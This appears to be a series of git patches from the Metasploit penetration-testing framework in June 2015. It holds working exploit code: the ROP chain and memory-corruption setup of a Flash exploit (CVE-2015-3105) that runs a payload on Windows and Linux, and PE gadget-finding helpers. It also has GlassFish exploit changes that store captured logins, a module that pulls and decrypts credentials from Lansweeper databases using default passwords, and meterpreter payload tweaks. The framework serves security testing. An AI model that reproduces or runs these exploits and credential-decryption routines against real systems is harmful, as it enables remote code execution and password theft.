+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 0x8, payload, true) // false
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/flash_exploiter/Logger.as b/external/source/flash_exploiter/Logger.as
new file mode 100644
index 0000000000..16c0447973
--- /dev/null
+++ b/external/source/flash_exploiter/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 0
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str);
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str);
+            }
+        }
+    }
+}
diff --git a/external/source/flash_exploiter/PE.as b/external/source/flash_exploiter/PE.as
new file mode 100644
index 0000000000..8753586477
--- /dev/null
+++ b/external/source/flash_exploiter/PE.as
@@ -0,0 +1,72 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var contents:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
+        }
+    }
+}

From e49c36998ca4580d3863240d7d2309b770baf040 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 25 Jun 2015 14:12:23 -0500
Subject: [PATCH 0564/1013] Fix indentation

---
 .../source/exploits/CVE-2015-3105/Exploit.as  | 214 +++++++++---------
 1 file changed, 107 insertions(+), 107 deletions(-)

diff --git a/external/source/exploits/CVE-2015-3105/Exploit.as b/external/source/exploits/CVE-2015-3105/Exploit.as
index 3cd687f6b4..8e666d6b7a 100755
--- a/external/source/exploits/CVE-2015-3105/Exploit.as
+++ b/external/source/exploits/CVE-2015-3105/Exploit.as
@@ -10,7 +10,7 @@ package
 
     public class Exploit extends Sprite
 	{
-		private var uv:Vector.<uint>
+        private var uv:Vector.<uint>
         private var canvas:Sprite
         private var filler_shader:Shader
         private var transformation_shader:Shader
@@ -45,7 +45,7 @@ package
             b64.decode(b64_payload)
             payload = b64.toByteArray()
             
-			canvas = new Sprite()
+            canvas = new Sprite()
             addChild(canvas)
             var size:uint = 400
 
@@ -57,71 +57,71 @@ package
                 
         private function do_exploit():void
         {
-			setup_shaders()
-			apply_shader_to_exploit()
-		}
+            setup_shaders()
+            apply_shader_to_exploit()
+        }
 		
-		private function setup_shaders():void
+        private function setup_shaders():void
         {
-			transformation_shader = new Shader(new TransformationPbj())
+            transformation_shader = new Shader(new TransformationPbj())
 			
-			ba_vector = new Vector.<Object>(ba_vector_length)
-			uint_vectors = new Vector.<Object>(uint_vectors_length)
+            ba_vector = new Vector.<Object>(ba_vector_length)
+            uint_vectors = new Vector.<Object>(uint_vectors_length)
 			
             // Initialize uint vectors
-			for(var i:uint = 0; i < uint_vectors_length; i++) // 70000
-			{
-				uint_vectors[i] = new Vector.<uint>()
-			}
-		    
+            for(var i:uint = 0; i < uint_vectors_length; i++) // 70000
+            {
+                uint_vectors[i] = new Vector.<uint>()
+            }
+
             // Allocate Byte Arrays
-			for(i = 0; i < ba_vector_length; i++) // 5000
-			{
-				ba_vector[i] = new ByteArray()
-				ba_vector[i].endian = "littleEndian"
-				ba_vector[i].length = ba_length // 0x2000
-				fill_byte_array(ba_vector[i], 0x35555555)
-				ba_vector[i].writeInt(0xbabefac0)
-				ba_vector[i].writeInt(0xbabefac1)
-				ba_vector[i].writeInt(i)
-				ba_vector[i].writeInt(0xbabefac3)
-			}
+            for(i = 0; i < ba_vector_length; i++) // 5000
+            {
+                ba_vector[i] = new ByteArray()
+                ba_vector[i].endian = "littleEndian"
+                ba_vector[i].length = ba_length // 0x2000
+                fill_byte_array(ba_vector[i], 0x35555555)
+                ba_vector[i].writeInt(0xbabefac0)
+                ba_vector[i].writeInt(0xbabefac1)
+                ba_vector[i].writeInt(i)
+                ba_vector[i].writeInt(0xbabefac3)
+            }
 			
-			// Make holes
-			for(i = 5000 / 3; i < ba_vector_length; i = i + 3) // 5000
-			{
-				fill_byte_array(ba_vector[i], 0x37777777)
-				ba_vector[i].clear()
-				ba_vector[i] = null
-			}
+            // Make holes
+            for(i = 5000 / 3; i < ba_vector_length; i = i + 3) // 5000
+            {
+                fill_byte_array(ba_vector[i], 0x37777777)
+                ba_vector[i].clear()
+                ba_vector[i] = null
+            }
 			
             // Setup shader
-			filler_shader = new Shader(new FillerPbj()) //test_bin.pbj 
-			filler_shader.data.point1.value = [top_middle.x, top_middle.y]
+            filler_shader = new Shader(new FillerPbj()) //test_bin.pbj 
+            filler_shader.data.point1.value = [top_middle.x, top_middle.y]
             filler_shader.data.point2.value = [bottom_left.x, bottom_left.y]
-			filler_shader.data.point3.value = [bottom_right.x, bottom_right.y]
-		}
+            filler_shader.data.point3.value = [bottom_right.x, bottom_right.y]
+        }
 		
-		final private function fill_byte_array(ba:ByteArray, value:int):void 
-		{
+        final private function fill_byte_array(ba:ByteArray, value:int):void 
+        {
             ba.position = 0
             var i:uint = 0
-			while (i < ba.length / 4)
-			{
-				ba.writeInt(value)
-				i = i + 1
-			}
+            while (i < ba.length / 4)
+            {
+                ba.writeInt(value)
+                i = i + 1
+            }
             ba.position = 0
             return
         }
 		
-		private function apply_shader_to_exploit():void
-		{	
-			try {
-				filler_shader.data.point3 = transformation_shader.data.positionTransformation27
-			} catch(err:Error) {
-				Logger.log("Error!")
-			}
+        private function apply_shader_to_exploit():void
+        {	
+            try {
+                filler_shader.data.point3 = transformation_shader.data.positionTransformation27
+            } catch(err:Error) {
+                Logger.log("Error!")
+            }
 			
             filler_shader.data.color1.value = [1, 1, 1, 1]
             
@@ -137,45 +137,45 @@ package
             var test:uint
             var mod_idx:uint = 0xffffffff
             for(var i:uint = 0; i< ba_vector_length; i++) { // 5000
-				if (ba_vector[i] != null) {
-					ba_vector[i].position = 32
-					test = ba_vector[i].readUnsignedInt()
-					if (test != 0x35555555) {
+                if (ba_vector[i] != null) {
+                    ba_vector[i].position = 32
+                    test = ba_vector[i].readUnsignedInt()
+                    if (test != 0x35555555) {
                         mod_idx = i
-						break
-					}
-				}
-			}
+                        break
+                    }
+                }
+            }
             
             if (mod_idx == 0xffffffff) {
                 Logger.log("[*] Exploit - apply_shader_to_exploit(): Modified ba not found... aborting")
                 return
             }
 			
-			// Clear the modified BA, we need a hole there =)
-			fill_byte_array(ba_vector[mod_idx], 0x39999999)
-			ba_vector[mod_idx].clear()
-			ba_vector[mod_idx] = null
-			
-			// Fill the BA space with well positioned Vector.<uint>'s, hopefully...
-			for(i = 0; i < uint_vectors_length; i++) // 70000
-			{
-				uint_vectors[i].length = 0x13e
-				uint_vectors[i][0] = 0xcccccccc
-				uint_vectors[i][1] = i
-				uint_vectors[i][2] = 0xaaaaaaaa
-			}
-			
+            // Clear the modified BA, we need a hole there =)
+            fill_byte_array(ba_vector[mod_idx], 0x39999999)
+            ba_vector[mod_idx].clear()
+            ba_vector[mod_idx] = null
+
+            // Fill the BA space with well positioned Vector.<uint>'s, hopefully...
+            for(i = 0; i < uint_vectors_length; i++) // 70000
+            {
+                uint_vectors[i].length = 0x13e
+                uint_vectors[i][0] = 0xcccccccc
+                uint_vectors[i][1] = i
+                uint_vectors[i][2] = 0xaaaaaaaa
+            }
+
             // Corrupt again, hopefully one of our vector lengths =)
             canvas.graphics.beginShaderFill(filler_shader)
 
             var corrupted:uint = 0xffffffff
-			for(i = 0; i < uint_vectors_length; i++) // 70000
-			{
-				if (uint_vectors[i].length != 0x13e) {
+            for(i = 0; i < uint_vectors_length; i++) // 70000
+            {
+                if (uint_vectors[i].length != 0x13e) {
                     corrupted = i
-					break 
-				}
+                    break 
+                }
 			}
 			
             if (corrupted == 0xffffffff) {
@@ -184,54 +184,54 @@ package
             }
 			
             var offset:uint = 0xffffffff
-			for(i = 0; i < 2048; i++)
-			{
-				if (uint_vectors[corrupted][i] == 0x13e && uint_vectors[corrupted][i+2] == 0xcccccccc) 
-				{
-					uint_vectors[corrupted][i] = 0xffffffff
+            for(i = 0; i < 2048; i++)
+            {
+            	if (uint_vectors[corrupted][i] == 0x13e && uint_vectors[corrupted][i+2] == 0xcccccccc) 
+            	{
+            		uint_vectors[corrupted][i] = 0xffffffff
                     offset = i
-					break
-				}
-			}
+            		break
+            	}
+            }
             
             if (offset == 0xffffffff) {
                 Logger.log("[*] Exploit - apply_shader_to_exploit(): Vector for manual corruption not found... aborting")
                 return
             }
 			
-			for(i = 0; i < uint_vectors_length; i++) // 70000
-			{
-				if (uint_vectors[i].length == 0xffffffff) {
-					uv = uint_vectors[i]
-					break 
-				}
-			}
+            for(i = 0; i < uint_vectors_length; i++) // 70000
+            {
+            	if (uint_vectors[i].length == 0xffffffff) {
+            		uv = uint_vectors[i]
+            		break 
+            	}
+            }
             
             if (uv == null) {
                 Logger.log("[*] Exploit - apply_shader_to_exploit(): Vector manually corrupted not found... aborting")
                 return
             }
 			
-			var my_offset:uint = 0x3ffffffe - offset - 2
-			uv[my_offset] = 0x13e
-            
+            var my_offset:uint = 0x3ffffffe - offset - 2
+            uv[my_offset] = 0x13e
+
             for(i = 0; i < ba_vector_length; i++) { // 5000
-				if (ba_vector[i] != null) {
-        			ba_vector[i].clear()
-        			ba_vector[i] = null
-				}
-			}
+                if (ba_vector[i] != null) {
+                    ba_vector[i].clear()
+                    ba_vector[i] = null
+                }
+            }
             
-			for(i = 0; i < uint_vectors_length; i++) // 70000
-			{
-				if (uint_vectors[i].length != 0xffffffff) {
+            for(i = 0; i < uint_vectors_length; i++) // 70000
+            {
+                if (uint_vectors[i].length != 0xffffffff) {
                     delete(uint_vectors[i])
-        			uint_vectors[i] = null
-				}
-			}
+                    uint_vectors[i] = null
+                }
+            }
             
             exploiter = new Exploiter(this, platform, os, payload, uv, 0x13e)
-		}
+        }
 
     }
 }

From 1a371b11b06d9a8cf6455ca7bd8d08611c5bfc17 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 25 Jun 2015 17:04:31 -0500
Subject: [PATCH 0565/1013] Update description

---
 modules/exploits/multi/http/glassfish_deployer.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index d2d1b02990..fe5f494cea 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -21,7 +21,9 @@ class Metasploit3 < Msf::Exploit::Remote
           This module logs in to an GlassFish Server (Open Source or Commercial) using various
         methods (such as authentication bypass, default credentials, or user-supplied login),
         and deploys a malicious war file in order to get remote code execution. It has been
-        tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x.
+        tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer
+        GlassFish versions do not allow remote access (Secure Admin) by default, but is required
+        for exploitation.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

From 5ef4cc2bb403994445bbd2e17700c5c9aaea121b Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 25 Jun 2015 17:10:20 -0500
Subject: [PATCH 0566/1013] Save creds

---
 .../exploits/multi/http/glassfish_deployer.rb | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)

diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index fe5f494cea..29fddf8d6a 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -659,6 +659,34 @@ class Metasploit3 < Msf::Exploit::Remote
     my_target_host = "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(datastore['PATH'])}"
   end
 
+
+  def report_cred(opts)
+    service_data = {
+      address: rhost,
+      port: rport,
+      service_name: 'glassfish',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      private_data: opts[:password],
+      origin_type: :service,
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      last_attempted_at: DateTime.now
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def try_normal_login(version)
     init_loginscanner
 
@@ -693,6 +721,7 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("Trying to login as #{cred.public}:#{cred.private}")
       result = @scanner.attempt_login(cred)
       if result.status == Metasploit::Model::Login::Status::SUCCESSFUL
+        report_cred(user: cred.public, password: cred.private)
         return @scanner.jsession
       end
     end

From 3da35951813fcacf013bf68e5aca973a67f08703 Mon Sep 17 00:00:00 2001
From: cldrn <calderon@websec.mx>
Date: Thu, 25 Jun 2015 19:29:30 -0500
Subject: [PATCH 0567/1013] MSF module to download and decrypt credentials
 stored in Lansweeper's database

---
 modules/auxiliary/gather/lansweeper.rb | 129 +++++++++++++++++++++++++
 1 file changed, 129 insertions(+)
 create mode 100644 modules/auxiliary/gather/lansweeper.rb

diff --git a/modules/auxiliary/gather/lansweeper.rb b/modules/auxiliary/gather/lansweeper.rb
new file mode 100644
index 0000000000..c0945eb825
--- /dev/null
+++ b/modules/auxiliary/gather/lansweeper.rb
@@ -0,0 +1,129 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::MSSQL
+	include Msf::Auxiliary::Report
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Lansweeper',
+			'Description'    => %q{
+					Lansweeper stores the credentials it uses to scan the computers
+					in its MSSQL database. The passwords are XTea-encrypted with a
+					68 character long key, which first 8 character is stored with the
+					password in the database, and the other 60 is static. Lansweeper by
+					default creates an MSSQL user "lansweeperuser" whose password is
+					"mysecretpassword0*", and stores its data in a database called
+					"lansweeperdb".
+					This module will query the MSSQL database for the credentials. 
+			},
+			'Author'         =>
+				[
+					# Lansweeper RCE + Metasploit implementation
+					'sghctoma <tamas.szakaly [at] praudit [dot] hu>' ,
+					
+					# Lansweeper RCE + discovering default credentials
+					'eq <balazs.bucsay [at] praudit [dot] hu>',
+
+                                        # Updated module to work on latest version of lansweeper
+                                        'calderpwn <calderon [at] websec [dot] mx>'
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', 'http://www.lansweeper.com'],
+                                        [ 'URL', 'http://www.praudit.hu/prauditeng/index.php/blog/a-lansweeper-es-a-tea']
+				]
+		))
+
+		register_options(
+			[
+				OptString.new('USERNAME', [ true, 'The username to authenticate as', 'lansweeperuser' ]),
+				OptString.new('PASSWORD', [ false, 'The password for the specified username', 'mysecretpassword0*' ]),
+				OptString.new('DATABASE', [ true, 'The Lansweeper database', 'lansweeperdb']),
+			], self.class)
+	end
+
+	def uint32(n)
+		return n & 0xffffffff
+	end
+
+	def xteadecode(v, k)
+		num = 0xc6ef3720
+		num2 = uint32(v[0])
+		num3 = uint32(v[1])
+
+		for i in 0..0x1f
+			num3 -= uint32((uint32(num2 << 4) ^ uint32(num2 >> 5)) + num2) ^
+				uint32(num + k[uint32(num >> 11) & 3])
+			num3 = uint32(num3)
+			num -= 0x9e3779b9
+			num = uint32(num)
+			num2 -= ((uint32(uint32(num3 << 4) ^ uint32(num3 >> 5)) + num3) ^
+				 uint32(num + k[num & 3]))
+			num2 = uint32(num2)
+		end
+
+		v[0] = num2
+		v[1] = num3
+	end
+
+	def xteadecrypt(data, key)
+		k = key.ljust(16).unpack('VVVV')
+		num = 0
+		bytes = Array.new
+
+		0.step(data.length - 1, 8) do |i|
+			v = data[i, 8].unpack('VV')
+			xteadecode(v, k)
+			
+			bytes[num] = v[0]
+			num += 1
+			bytes[num] = v[1]
+			num += 1
+		end
+		
+		return bytes.pack('c*')
+	end
+
+	def lswgeneratepass()
+		key = ''
+
+		for num in 0..60
+			key << [((40 - num) + ((num * 2) + num)) - 1].pack('c')
+			key << [(num + 15) + num].pack('c')
+		end
+
+		return key
+	end
+
+	def lswdecrypt(data)
+
+		data = Rex::Text.decode_base64(data)
+
+		first = data[0]
+		pass = data[1,8]
+		actualdata = data[9, data.length - 9]
+
+		decrypted = xteadecrypt(actualdata, pass + lswgeneratepass())
+
+		if first == "1"
+			decrypted = decrypted[0, decrypted.length - 2]
+		end
+
+		return Rex::Text.to_ascii(decrypted, 'utf-16le')
+
+	end
+
+	def run
+		result = mssql_query('select Credname, Username, Password from ' + datastore['DATABASE'] +
+			'.dbo.tsysCredentials WHERE LEN(Password)>64', true) if mssql_login_datastore
+	        
+		result[:rows].each do |row|
+			print_good("Credential name: #{row[0]} | username: #{row[1]} | password: #{lswdecrypt(row[2])} ")
+		end
+
+		disconnect
+	end
+end

From c70e38a14e98e52b648883cd6cc86aa1f02622c2 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 25 Jun 2015 22:39:56 -0500
Subject: [PATCH 0568/1013] Do more reporting

---
 .../exploits/multi/http/glassfish_deployer.rb | 32 +++++++++++++++++--
 1 file changed, 29 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index 29fddf8d6a..ee6537e866 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -13,6 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
+  include Msf::Auxiliary::Report
 
   def initialize(info={})
     super(update_info(info,
@@ -270,19 +271,28 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
+  def report_glassfish_version(banner)
+    report_note(
+      host: rhost,
+      type: 'glassfish.banner',
+      data: banner,
+      update: :unique_data
+    )
+  end
+
   #
   # Return GlassFish's edition (Open Source or Commercial) and version (2.x, 3.0, 3.1, 9.x) and
   # banner (ex: Sun Java System Application Server 9.x)
   #
   def get_version(res)
-    #Extract banner from response
+    # Extract banner from response
     banner = res.headers['Server']
 
-    #Default value for edition and glassfish version
+    # Default value for edition and glassfish version
     edition = 'Commercial'
     version = 'Unknown'
 
-    #Set edition (Open Source or Commercial)
+    # Set edition (Open Source or Commercial)
     p = /(Open Source|Sun GlassFish Enterprise Server|Sun Java System Application Server)/
     edition = 'Open Source' if banner =~ p
 
@@ -301,6 +311,8 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("Unsupported version: #{banner}")
     end
 
+    report_glassfish_version(banner)
+
     return edition, version, banner
   end
 
@@ -632,6 +644,18 @@ class Metasploit3 < Msf::Exploit::Remote
     )
   end
 
+  def report_auth_bypass(version)
+    report_vuln(
+      name: 'GlassFish HTTP Method Authentication Bypass',
+      info: "The remote service has a vulnerable version of GlassFish (#{version}) that allows the " \
+            'attacker to bypass authentication by sending an HTTP verb in lower-case.',
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      refs: self.references
+    )
+  end
+
   def try_glassfish_auth_bypass(version)
     sid = nil
 
@@ -652,6 +676,8 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
+    report_auth_bypass(version) if sid
+
     sid
   end
 

From a773979992c183d0b9cadd6ac53adf8529643612 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 26 Jun 2015 13:59:09 +1000
Subject: [PATCH 0569/1013] Java config wiring, tweak to include block counts

This commit adjusts the way that the config block is set for java and
android because behind the scenes the stageless connect-backs need to
know what to discard. as a result of connecting back to staged listeners
we need to be able to discard a number of bytes/blocks before we can
continue process (at least in the case of TCP).
---
 lib/msf/core/payload/java.rb                  |  4 +-
 .../payloads/stages/android/meterpreter.rb    | 28 +++++----
 modules/payloads/stages/java/meterpreter.rb   | 63 ++++++++++++++-----
 3 files changed, 63 insertions(+), 32 deletions(-)

diff --git a/lib/msf/core/payload/java.rb b/lib/msf/core/payload/java.rb
index bebcedca32..d61b2190cc 100644
--- a/lib/msf/core/payload/java.rb
+++ b/lib/msf/core/payload/java.rb
@@ -18,9 +18,9 @@ module Msf::Payload::Java
     stage = ''
     @stage_class_files.each do |path|
       data = MetasploitPayloads.read('java', path)
-      stage << ([data.length].pack("N") + data)
+      stage << [data.length, data].pack('NA*')
     end
-    stage << [0].pack("N")
+    stage << [0].pack('N')
 
     stage
   end
diff --git a/modules/payloads/stages/android/meterpreter.rb b/modules/payloads/stages/android/meterpreter.rb
index 20f7f52825..fe89735e12 100644
--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@@ -15,20 +15,16 @@ module Metasploit4
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'      => 'Android Meterpreter',
+      'Name'        => 'Android Meterpreter',
       'Description' => 'Run a meterpreter server on Android',
-      'Author'    => [
-          'mihi', # all the hard work
-          'egypt', # msf integration
-          'anwarelmakrahy' # android extension
-        ],
+      'Author'      => ['mihi', 'egypt', 'anwarelmakrahy', 'OJ Reeves'],
       'Platform'    => 'android',
-      'Arch'      => ARCH_DALVIK,
-      'License'   => MSF_LICENSE,
-      'Session'   => Msf::Sessions::Meterpreter_Java_Android))
